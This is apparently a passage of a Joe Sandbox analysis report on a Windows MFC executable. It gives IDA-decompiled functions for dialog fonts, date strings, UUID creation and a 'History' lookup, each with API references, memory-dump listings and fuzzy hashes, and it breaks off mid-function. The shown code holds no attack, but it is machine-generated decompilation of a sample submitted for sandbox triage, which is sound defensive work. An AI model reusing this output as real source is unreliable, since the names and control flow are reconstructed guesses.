    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: Rect$#3797InflateWindow$#2859#2864#3812#3874#540#6197#6880ClientExtentH_prologMessageParentPoint32ReleaseSendText
    • String ID:
    • API String ID: 334588786-0
    • Opcode ID: e566932aaeddadd8b7e278e29096f1df490a5c410b4b706f2779c793297306d4
    • Instruction ID: cb9b05dac14e2db4ac9104f56948bafb3549abb0b68e2b757e785f41188b406e
    • Opcode Fuzzy Hash: e566932aaeddadd8b7e278e29096f1df490a5c410b4b706f2779c793297306d4
    • Instruction Fuzzy Hash: E971F9B1E0011ADFDF15DFA9C985AEEBBB5BF48300F14026AE905F7291DB38A941CB54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 67%
    			E00418B40(void* __ecx) {
    				void* __esi;
    				void* _t50;
    				void* _t51;
    				CHAR* _t56;
    				long _t57;
    				long _t58;
    				intOrPtr* _t64;
    				intOrPtr* _t71;
    				intOrPtr* _t78;
    				long _t83;
    				void* _t90;
    				int _t91;
    				void* _t93;
    				int _t94;
    				void* _t96;
    				int _t97;
    				void* _t124;
    				void* _t126;
    
    				_t50 = E0043E4E0(0x440fe0, _t126);
    				_t124 = __ecx;
    				L0043DF94();
    				_t83 = 1;
    				_push(_t83);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(__ecx);
    				_push(_t83);
    				_t51 = L00404F47(_t50, __ecx + 0x174, __ecx);
    				_push(_t83);
    				_push(0x808080);
    				_push(0x10101);
    				_push(0xefefef);
    				_push(_t124);
    				_push(0x8006);
    				L00404F47(_t51, _t124 + 0x1c8, _t124);
    				memset(_t126 - 0x50, 0, 0x3c);
    				 *(_t126 - 0x50) = 0x13;
    				 *((intOrPtr*)(_t126 - 0x40)) = 0x2bc;
    				 *(_t126 - 0x3b) = _t83;
    				 *(_t126 - 0x39) = _t83;
    				_t56 = lstrcpyA(_t126 - 0x34, "Arial");
    				_push(0);
    				_push("Arial");
    				_push(0x64);
    				L0043E2C4();
    				_push(0x3f8);
    				L0043E066();
    				_t90 = _t124 + 0x444;
    				if(_t90 != 0) {
    					_t91 =  *(_t90 + 4);
    				} else {
    					_t91 = 0;
    				}
    				_t57 = SendMessageA(_t56[0x20], 0x30, _t91, _t83);
    				_push(0x3f9);
    				L0043E066();
    				_t93 = _t124 + 0x444;
    				if(_t93 != 0) {
    					_t94 =  *(_t93 + 4);
    				} else {
    					_t94 = 0;
    				}
    				_t58 = SendMessageA( *(_t57 + 0x20), 0x30, _t94, _t83);
    				_push(0x430);
    				L0043E066();
    				_t96 = _t124 + 0x444;
    				if(_t96 != 0) {
    					_t97 =  *(_t96 + 4);
    				} else {
    					_t97 = 0;
    				}
    				SendMessageA( *(_t58 + 0x20), 0x30, _t97, _t83);
    				E0040C6ED(_t124 + 0x60, _t126 - 0x50);
    				E0040CF63(_t124 + 0x60, 0xc08080, _t83);
    				_t64 = E00429029(_t126 - 0x10, 0xe036);
    				 *(_t126 - 4) = 0;
    				E0040CF2E(_t124 + 0x60, 2,  *_t64, 0, 0, _t83, 0, 0);
    				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
    				L0043DD36();
    				 *((intOrPtr*)(_t126 - 0x40)) = 0x1f4;
    				 *(_t126 - 0x50) = 0x10;
    				E0040C6ED(_t124 + 0x330, _t126 - 0x50);
    				E0040CF63(_t124 + 0x330, 0x323232, _t83);
    				_t71 = E00429029(_t126 - 0x10, 0xe035);
    				 *(_t126 - 4) = _t83;
    				E0040CF2E(_t124 + 0x330, 2,  *_t71, 0, 0, _t83, 0, 0);
    				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
    				L0043DD36();
    				E0040C6ED(_t124 + 0x21c, _t126 - 0x50);
    				E0040CF63(_t124 + 0x21c, 0x323232, _t83);
    				_t78 = E00429029(_t126 - 0x14, 0xe026);
    				 *(_t126 - 4) = 2;
    				E0040CF2E(_t124 + 0x21c, 5,  *_t78, 0, 0, _t83, 0, 0);
    				 *(_t126 - 4) =  *(_t126 - 4) | 0xffffffff;
    				L0043DD36();
    				_push(0x454574);
    				_push(0x3f9);
    				L0043E066();
    				L0043E15C();
    				 *[fs:0x0] =  *((intOrPtr*)(_t126 - 0xc));
    				return _t83;
    			}

    0x00418b45
    0x00418b50
    0x00418b52
    0x00418b5e
    0x00418b65
    0x00418b66
    0x00418b6b
    0x00418b70
    0x00418b71
    0x00418b72
    0x00418b73
    0x00418b78
    0x00418b79
    0x00418b7e
    0x00418b83
    0x00418b84
    0x00418b85
    0x00418b90
    0x00418b9e
    0x00418ba9
    0x00418bb0
    0x00418bbd
    0x00418bc0
    0x00418bc3
    0x00418bc9
    0x00418bca
    0x00418bd5
    0x00418bd7
    0x00418bdc
    0x00418be3
    0x00418be8
    0x00418bf0
    0x00418bf6
    0x00418bf2
    0x00418bf2
    0x00418bf2
    0x00418c00
    0x00418c06
    0x00418c0d
    0x00418c12
    0x00418c1a
    0x00418c20
    0x00418c1c
    0x00418c1c
    0x00418c1c
    0x00418c2a
    0x00418c30
    0x00418c37
    0x00418c3c
    0x00418c44
    0x00418c4a
    0x00418c46
    0x00418c46
    0x00418c46
    0x00418c54
    0x00418c61
    0x00418c6f
    0x00418c7d
    0x00418c91
    0x00418c94
    0x00418c99
    0x00418ca0
    0x00418caf
    0x00418cb6
    0x00418cbd
    0x00418cce
    0x00418cdc
    0x00418cf3
    0x00418cf6
    0x00418cfb
    0x00418d02
    0x00418d11
    0x00418d22
    0x00418d30
    0x00418d37
    0x00418d4e
    0x00418d53
    0x00418d5a
    0x00418d5f
    0x00418d64
    0x00418d6b
    0x00418d72
    0x00418d7f
    0x00418d87

    APIs
    • __EH_prolog.LIBCMT ref: 00418B45
    • #4710.MFC42 ref: 00418B52
    • memset.MSVCRT ref: 00418B9E
    • lstrcpyA.KERNEL32(?,Arial), ref: 00418BC3
    • #2243.MFC42(00000064,Arial,00000000), ref: 00418BD7
    • #3092.MFC42(000003F8,00000064,Arial,00000000), ref: 00418BE3
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C00
    • #3092.MFC42(000003F9), ref: 00418C0D
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C2A
    • #3092.MFC42(00000430), ref: 00418C37
    • SendMessageA.USER32(?,00000030,?,00000001), ref: 00418C54
    • #800.MFC42 ref: 00418CA0
    • #800.MFC42 ref: 00418D02
      • Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
      • Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
      • Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A
    • #800.MFC42 ref: 00418D5A
    • #3092.MFC42(000003F9,00454574), ref: 00418D6B
    • #6199.MFC42(000003F9,00454574), ref: 00418D72
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3092$#800MessageSend$#1168#2243#4710#537#6199H_prologLoadStringlstrcpymemset
    • String ID: Arial
    • API String ID: 3213624125-493054409
    • Opcode ID: 1c5a3aa46f0a2864949f950dcefa2baf77cd7f35bf412aa7b3ec73d6508c9a42
    • Instruction ID: f61fd79e73c8ef8ce73ab983091c37a1c329913653e38a5eaefa36425ccff504
    • Opcode Fuzzy Hash: 1c5a3aa46f0a2864949f950dcefa2baf77cd7f35bf412aa7b3ec73d6508c9a42
    • Instruction Fuzzy Hash: 1051B070641248BBD728EBA2DC96FAF777DEB85708F10051EF152A61C1DBB86A04C718
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 60%
    			E0042049A(intOrPtr __ecx) {
    				CHAR* _t41;
    				void* _t48;
    				intOrPtr _t49;
    				intOrPtr _t50;
    				CHAR* _t55;
    				intOrPtr _t78;
    				intOrPtr _t81;
    				void* _t88;
    
    				E0043E4E0(0x441edc, _t88);
    				_t41 =  *(_t88 + 8);
    				_t78 = __ecx;
    				 *((intOrPtr*)(_t88 - 0x20)) = __ecx;
    				if( *_t41 == 0) {
    					lstrcpyA(_t78 + 0x152,  *(E00429029(_t88 - 0x18, 0xe014)));
    					L0043DD36();
    				} else {
    					lstrcpyA(__ecx + 0x152, _t41);
    				}
    				_push( *((intOrPtr*)(_t88 + 0xc)));
    				_push(_t88 - 0x14);
    				E00420679(_t78);
    				_t48 = _t88 + 8;
    				_push(_t48);
    				 *(_t88 - 4) = 0;
    				L0043E162();
    				L0043DDD8();
    				_push(0);
    				 *(_t88 - 4) = 1;
    				L0043E288();
    				_t49 =  *((intOrPtr*)(_t48 + 4));
    				_push(0);
    				 *((intOrPtr*)(_t88 + 0xc)) = _t49;
    				L0043E288();
    				_t50 =  *((intOrPtr*)(_t49 + 8));
    				_push(0);
    				 *((intOrPtr*)(_t88 - 0x1c)) = _t50;
    				L0043E288();
    				_push(0);
    				L0043E288();
    				_push(0);
    				L0043E288();
    				_push( *((intOrPtr*)(_t88 + 0xc)));
    				_push( *((intOrPtr*)(_t88 - 0x1c)));
    				_push( *((intOrPtr*)(_t50 + 0x14)) + 0x76c);
    				_push( *((intOrPtr*)(_t50 + 0x10)) + 1);
    				_push( *((intOrPtr*)(_t50 + 0xc)));
    				_push("%02d-%02d-%d %02d:%02d");
    				_push(_t88 - 0x10);
    				L0043E174();
    				_t81 =  *((intOrPtr*)(_t88 - 0x20));
    				lstrcpyA(_t81 + 0x1c,  *(_t88 - 0x10));
    				_t55 = lstrcpyA(_t81 + 0x4e,  *(_t88 - 0x14));
    				 *(_t88 - 4) =  *(_t88 - 4) & 0x00000000;
    				L0043DD36();
    				 *(_t88 - 4) =  *(_t88 - 4) | 0xffffffff;
    				L0043DD36();
    				 *[fs:0x0] =  *((intOrPtr*)(_t88 - 0xc));
    				return _t55;
    			}

    0x0042049f
    0x004204a7
    0x004204b0
    0x004204b2
    0x004204b5
    0x004204e8
    0x004204ed
    0x004204b7
    0x004204c5
    0x004204c5
    0x004204f2
    0x004204fa
    0x004204fb
    0x00420500
    0x00420505
    0x00420506
    0x00420509
    0x00420511
    0x00420516
    0x0042051a
    0x0042051e
    0x00420523
    0x00420526
    0x0042052a
    0x0042052d
    0x00420532
    0x00420535
    0x00420539
    0x0042053c
    0x00420544
    0x0042054e
    0x00420556
    0x0042055c
    0x00420561
    0x00420567
    0x0042056a
    0x0042056b
    0x0042056c
    0x00420570
    0x00420575
    0x00420576
    0x0042057b
    0x00420588
    0x00420591
    0x00420593
    0x0042059a
    0x0042059f
    0x004205a6
    0x004205b1
    0x004205b9

    APIs
    • __EH_prolog.LIBCMT ref: 0042049F
    • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 004204C5
    • lstrcpyA.KERNEL32(?,00000000,?,?,?), ref: 004204E8
    • #800.MFC42(?,?,?), ref: 004204ED
    • #3811.MFC42(?,?,00000008,?,?,?), ref: 00420509
    • #540.MFC42(?,?,00000008,?,?,?), ref: 00420511
    • #3337.MFC42(00000000,?,?,00000008,?,?,?), ref: 0042051E
    • #3337.MFC42(00000000,00000000,?,?,00000008,?,?,?), ref: 0042052D
    • #3337.MFC42(00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042053C
    • #3337.MFC42(00000000,00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042054E
    • #3337.MFC42(00000000,00000000,00000000,00000000,00000000,?,?,00000008,?,?,?), ref: 0042055C
    • #2818.MFC42(?,%02d-%02d-%d %02d:%02d,?,?,?,?,00000008,00000000,00000000,00000000,00000000,00000000,?,?,00000008), ref: 00420576
    • lstrcpyA.KERNEL32(?,?,00000000,?,?,00000008,?,?,?), ref: 00420588
    • lstrcpyA.KERNEL32(?,?,?,?,?), ref: 00420591
    • #800.MFC42(?,?,?), ref: 0042059A
    • #800.MFC42(?,?,?), ref: 004205A6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #3337$lstrcpy$#800$#2818#3811#540H_prolog
    • String ID: %02d-%02d-%d %02d:%02d
    • API String ID: 1729780190-3031491251
    • Opcode ID: 5b98ede3ff9bdc8a4031ecf22832bccaeb22337cff8d7d32a19b7110e64b15c8
    • Instruction ID: 56ab26c35428acc48a7c3bb9438dd5f24b767c92c57669d4f880caef722fc54a
    • Opcode Fuzzy Hash: 5b98ede3ff9bdc8a4031ecf22832bccaeb22337cff8d7d32a19b7110e64b15c8
    • Instruction Fuzzy Hash: A1319072900108AFCF05EFE5DC85EEEBB78EF49354F40855AF5056B192DB38AA05CBA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00410EF3(intOrPtr* __ecx) {
    				void* __esi;
    				void* _t37;
    				void* _t44;
    				void* _t60;
    				void* _t63;
    				intOrPtr* _t64;
    				void* _t66;
    
    				_t37 = E0043E4E0(0x4405b5, _t66);
    				_t64 = __ecx;
    				 *((intOrPtr*)(_t66 - 0x14)) = __ecx;
    				L0043DDD8();
    				 *((intOrPtr*)(_t66 - 4)) = 0;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 1;
    				L0043DE26();
    				 *((char*)(_t66 - 4)) = 2;
    				L0043DE26();
    				 *((char*)(_t66 - 4)) = 3;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 4;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 5;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 6;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 7;
    				L004044F9(_t37, __ecx + 0x24, __ecx);
    				 *((intOrPtr*)(_t64 + 0x40)) = 0x447034;
    				 *((intOrPtr*)(_t64 + 0x44)) = 0;
    				 *((intOrPtr*)(_t64 + 0x50)) = 0;
    				 *((intOrPtr*)(_t64 + 0x4c)) = 0;
    				 *((intOrPtr*)(_t64 + 0x48)) = 0;
    				 *((char*)(_t66 - 4)) = 9;
    				 *((intOrPtr*)(_t64 + 0x54)) = 0;
    				L0043DDD8();
    				 *((char*)(_t66 - 4)) = 0xa;
    				 *((intOrPtr*)(_t64 + 0x5c)) = 1;
    				 *_t64 = 0x447030;
    				__imp__UuidCreate(_t66 - 0x24, "iso-8859-1", "text/plain", _t60, _t63, _t44);
    				 *((intOrPtr*)(_t66 - 0x10)) = 0;
    				__imp__UuidToStringA(_t66 - 0x24, _t66 - 0x10);
    				L0043DDD2();
    				__imp__RpcStringFreeA(_t66 - 0x10,  *((intOrPtr*)(_t66 - 0x10)));
    				 *[fs:0x0] =  *((intOrPtr*)(_t66 - 0xc));
    				return _t64;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #540$#537StringUuid$#860CreateFreeH_prolog
    • String ID: 4pD$iso-8859-1$text/plain
    • API String ID: 1286026054-4277725893
    • Opcode ID: 8f2374d50da981245fb8b43d862cbe1456e2858b51ce6f68f4d4263cef1a6b70
    • Instruction ID: b972c790513ab5944480ace23ca8f65072f69f3288099e0dd6200eea52a4d851
    • Opcode Fuzzy Hash: 8f2374d50da981245fb8b43d862cbe1456e2858b51ce6f68f4d4263cef1a6b70
    • Instruction Fuzzy Hash: 5D316FB4801784DECB21EFA6D5457DEFBF4AF68308F10485EE48353692DBB86608CB25
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E0040A178(intOrPtr __ecx) {
    				intOrPtr* _t73;
    				signed int _t76;
    				signed char _t79;
    				void* _t82;
    				intOrPtr* _t83;
    				void* _t84;
    				intOrPtr* _t86;
    				void* _t87;
    				void* _t95;
    				signed int _t97;
    				void* _t119;
    				signed int _t120;
    				signed int _t124;
    				intOrPtr* _t128;
    				void* _t129;
    				void* _t131;
    				void* _t132;
    
    				E0043E4E0(0x43f9d4, _t129);
    				_t132 = _t131 - 0x24;
    				_t124 = 0;
    				 *((intOrPtr*)(_t129 - 0x24)) = __ecx;
    				 *((intOrPtr*)(_t129 - 0x30)) = 0;
    				if( *((intOrPtr*)(_t129 + 0xc)) == 0) {
    					L26:
    					_push(0x4550cc);
    					L0043DE26();
    					L27:
    					 *[fs:0x0] =  *((intOrPtr*)(_t129 - 0xc));
    					return  *((intOrPtr*)(_t129 + 8));
    				}
    				 *0x455248 = 3;
    				_push(_t129 - 0x30);
    				_push(0x44a5e4);
    				_push(0);
    				 *0x455250 = 0;
    				_push( *((intOrPtr*)(_t129 + 0xc)));
    				if( *((intOrPtr*)(__ecx + 0x10))() != 0) {
    					goto L26;
    				}
    				_t95 = 0x4550cc;
    				_push(0x4550cc);
    				 *(_t129 - 0x10) = 0;
    				L0043DE26();
    				_t73 =  *((intOrPtr*)(_t129 - 0x30));
    				 *(_t129 - 0x14) = 0;
    				_push(_t129 - 0x14);
    				_push(_t73);
    				 *(_t129 - 4) = 0;
    				if( *((intOrPtr*)( *_t73 + 0x20))() == 0) {
    					_t76 =  *(_t129 - 0x14) << 4;
    					_push(_t76);
    					L0043DD54();
    					_t119 = 0;
    					 *(_t129 - 0x2c) = _t76;
    					if( *(_t129 - 0x14) <= 0) {
    						L8:
    						 *((intOrPtr*)(_t129 - 0x28)) = _t124;
    						_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t129 - 0x24)) + 0xc))( *((intOrPtr*)(_t129 - 0x30)), _t124,  *(_t129 - 0x14),  *(_t129 - 0x2c), _t129 - 0x28);
    						if(_t79 != 0) {
    							goto L3;
    						}
    						 *(_t129 + 0xf) =  *(_t129 + 0xf) & _t79;
    						 *((intOrPtr*)(_t129 - 0x24)) = _t124;
    						if( *((intOrPtr*)(_t129 - 0x28)) <= _t124) {
    							L24:
    							_push( *(_t129 - 0x2c));
    							L0043DD42();
    							_push(_t129 - 0x18);
    							L0043DD3C();
    							L25:
    							 *(_t129 - 4) =  *(_t129 - 4) | 0xffffffff;
    							L0043DD36();
    							goto L27;
    						}
    						_t120 =  *(_t129 - 0x2c);
    						 *(_t129 - 0x20) = _t120;
    						do {
    							if( *(_t129 + 0xf) == 0) {
    								_t82 =  *_t120;
    								 *((intOrPtr*)(_t129 - 0x1c)) = _t124;
    								if(_t82 != 3) {
    									if(_t82 == 9) {
    										_t128 =  *((intOrPtr*)(_t120 + 8));
    										 *((intOrPtr*)( *_t128))(_t128, 0x453680, _t129 - 0x1c);
    										 *((intOrPtr*)( *_t128 + 8))(_t128);
    									}
    								} else {
    									 *((intOrPtr*)(_t129 - 0x1c)) =  *((intOrPtr*)(_t120 + 8));
    								}
    								_t83 =  *((intOrPtr*)(_t129 - 0x1c));
    								_t132 = _t132 - 0x10;
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								asm("movsd");
    								_t84 =  *((intOrPtr*)( *_t83 + 0x28))(_t83, _t129 - 0x10);
    								if( *(_t129 - 0x10) != 0 && _t84 == 0 && wcscmp(L"History",  *(_t129 - 0x10)) == 0) {
    									__imp__#6( *(_t129 - 0x10));
    									_t86 =  *((intOrPtr*)(_t129 - 0x1c));
    									_t132 = _t132 - 0x10;
    									asm("movsd");
    									asm("movsd");
    									asm("movsd");
    									asm("movsd");
    									_t87 =  *((intOrPtr*)( *_t86 + 0x2c))(_t86, _t129 - 0x10);
    									if( *(_t129 - 0x10) != 0 && _t87 == 0) {
    										L0043E150();
    										__imp__#6( *(_t129 - 0x10),  *(_t129 - 0x10));
    										 *(_t129 + 0xf) = 1;
    									}
    								}
    								_t120 =  *(_t129 - 0x20);
    								_t124 = 0;
    							}
    							__imp__#9(_t120);
    							 *((intOrPtr*)(_t129 - 0x24)) =  *((intOrPtr*)(_t129 - 0x24)) + 1;
    							_t120 = _t120 + 0x10;
    							 *(_t129 - 0x20) = _t120;
    						} while ( *((intOrPtr*)(_t129 - 0x24)) <  *((intOrPtr*)(_t129 - 0x28)));
    						goto L24;
    					} else {
    						_t97 = _t76;
    						do {
    							__imp__#8(_t97);
    							_t119 = _t119 + 1;
    							_t97 = _t97 + 0x10;
    						} while (_t119 <  *(_t129 - 0x14));
    						_t95 = 0x4550cc;
    						goto L8;
    					}
    				}
    				L3:
    				_push(_t95);
    				L0043DE26();
    				goto L25;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040A17D
    • #537.MFC42(004550CC,?,?,00000000), ref: 0040A1CC
    • #537.MFC42(004550CC,?,?,00000000), ref: 0040A1EC
    • #823.MFC42(?,?,?,00000000), ref: 0040A1FD
    • VariantInit.OLEAUT32(00000000), ref: 0040A210
    • wcscmp.MSVCRT ref: 0040A2BE
    • SysFreeString.OLEAUT32(00000000), ref: 0040A2CD
    • #861.MFC42(00000000), ref: 0040A2FB
    • SysFreeString.OLEAUT32(00000000), ref: 0040A303
    • VariantClear.OLEAUT32(?), ref: 0040A313
    • #800.MFC42(004550CC,?,?,00000000), ref: 0040A34A
    • #537.MFC42(004550CC,?,?,00000000), ref: 0040A359
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537$FreeStringVariant$#800#823#861ClearH_prologInitwcscmp
    • String ID: HRE$History
    • API String ID: 2829193234-650093438
    • Opcode ID: 7f353e4b19f91a7353e8edc8584523a8f8a10ff1201cd8c487b9c0eb3573ed57
    • Instruction ID: a36b2953deea37e944a7b106475b5a66946117464f9bc424d7a178f90236976b
    • Opcode Fuzzy Hash: 7f353e4b19f91a7353e8edc8584523a8f8a10ff1201cd8c487b9c0eb3573ed57
    • Instruction Fuzzy Hash: 54617E70D00219EFCB11EFA9D844AEEBBB4FF48754F10452AF811B7291D7389A51CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E00429920(void* __eflags) {
    				intOrPtr* _t57;
    				intOrPtr* _t63;
    				signed char _t68;
    				void* _t87;
    				intOrPtr _t89;
    				signed int _t93;
    				void* _t95;
    
    				E0043E4E0(0x44304b, _t95);
    				 *(_t95 - 0x1c) =  *(_t95 - 0x1c) & 0x00000000;
    				L0043DDD8();
    				_t68 = 1;
    				 *(_t95 - 4) = _t68;
    				L0043DDD8();
    				_t89 =  *((intOrPtr*)(_t95 + 0xc));
    				_t93 =  *(_t95 + 0x10) * 0x1004;
    				_push(_t95 - 0x2c);
    				 *(_t95 - 4) = 2;
    				L0043E4A4();
    				 *(_t95 + 0x10) = E004290DB( *((intOrPtr*)(_t89 + 4)) + _t93, _t95 - 0x18, _t95 - 0x2c);
    				 *(_t95 - 4) = 3;
    				_t57 = E00429098( *((intOrPtr*)(_t89 + 4)) + _t93, _t95 + 0xc, _t95 - 0x2c);
    				 *(_t95 - 4) = 4;
    				_push( *( *(_t95 + 0x10)));
    				_push( *_t57);
    				_push("%s, %s");
    				_push(_t95 - 0x10);
    				L0043E174();
    				 *(_t95 - 4) = 3;
    				L0043DD36();
    				 *(_t95 - 4) = 2;
    				L0043DD36();
    				 *(_t95 + 0x10) = E004290DB(_t95 - 0x18, _t95 - 0x18, _t95 - 0x2c);
    				 *(_t95 - 4) = 5;
    				_t63 = E00429029(_t95 + 0xc, 0xe017);
    				 *(_t95 - 4) = 6;
    				_t31 =  *((intOrPtr*)(_t89 + 4)) + _t93 + 4; // 0x9
    				_t87 = _t31;
    				_push(_t87);
    				_push( *((intOrPtr*)(_t95 - 0x10)));
    				_push(_t87);
